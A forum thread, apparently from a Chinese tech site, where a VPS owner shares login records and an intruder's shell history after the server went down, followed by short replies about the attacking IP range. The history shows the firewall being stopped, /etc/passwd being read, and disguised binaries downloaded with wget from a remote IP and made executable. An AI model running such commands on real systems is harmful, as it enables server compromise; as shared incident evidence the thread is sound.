这是一个创建于 3285 天前的主题,其中的信息可能已经有所发展或是发生改变。
一台vps无故down了,重启后发现...
who /var/log/wtmp:
butten tty1 2015-04-29 23:59
root pts/0 2015-04-30 00:01 (lz的ip)
butten tty1 2015-04-30 00:01
butten tty1 2015-04-30 00:02
butten tty1 2015-04-30 00:16
su - butten
history:
311 2015-04-30 00:01:30 w
312 2015-04-30 00:01:35 clear
313 2015-04-30 00:01:36 w
314 2015-04-30 00:01:47 exit
315 2015-04-30 00:02:29 clear
316 2015-04-30 00:02:31 cat /etc/passwd
317 2015-04-30 00:02:39 clear
318 2015-04-30 00:02:40 w
319 2015-04-30 00:02:45 clear
320 2015-04-30 00:02:46 w
321 2015-04-30 00:02:48 ls
322 2015-04-30 00:02:51 cd /usr/bin
323 2015-04-30 00:02:52 wget
324 2015-04-30 00:03:03 wget http://222.186.52.66:1112/java-jdk
325 2015-04-30 00:03:16 service iptables stop
326 2015-04-30 00:03:37 wget http://222.186.52.66:1112/java-jdk
327 2015-04-30 00:04:25 wget http://222.186.52.66:1112/syslogd
328 2015-04-30 00:06:16 chmod 777 syslogd
329 2015-04-30 00:06:16 w
330 2015-04-30 00:06:19 clear
331 2015-04-30 00:06:23 chmod 777 java-jdk
332 2015-04-30 00:06:26 chmod 777 syslogd
333 2015-04-30 00:08:31 w
334 2015-04-30 00:08:36 clear
335 2015-04-30 00:08:37 w
336 2015-04-30 00:08:38 clear
337 2015-04-30 00:08:40 ps -ef
338 2015-04-30 00:08:44 clear
339 2015-04-30 00:08:45 ss
340 2015-04-30 00:08:53 clear
341 2015-04-30 00:08:55 exit
这个butten发帖的时候还在tty1...
 |
1
scys 2015-04-30 00:51:32 +08:00
yes
|
 |
2
rhwood OP 为什么butten可以从tty1登录?好像踢不掉。。。
|
 |
3
xiaozhizhu1997 2015-04-30 08:48:08 +08:00 via Android
又见222.186.*.*
镇江机房尼玛真是黑窝啊 |
 |
4
chimon 2015-04-30 10:25:16 +08:00
诶!!遇到老乡mark一下~
|
 |
5
Dk2014 2015-04-30 11:29:06 +08:00 via Android
吓的我去看了下
没发现其他用户和其他ip登录的记录 _(:з」∠)_ |
 |
6
hadoop 2017-02-15 19:56:19 +08:00 via Android
lz 找到从 tty1 登录原因了吗?我今天也遇到了
|
Select Language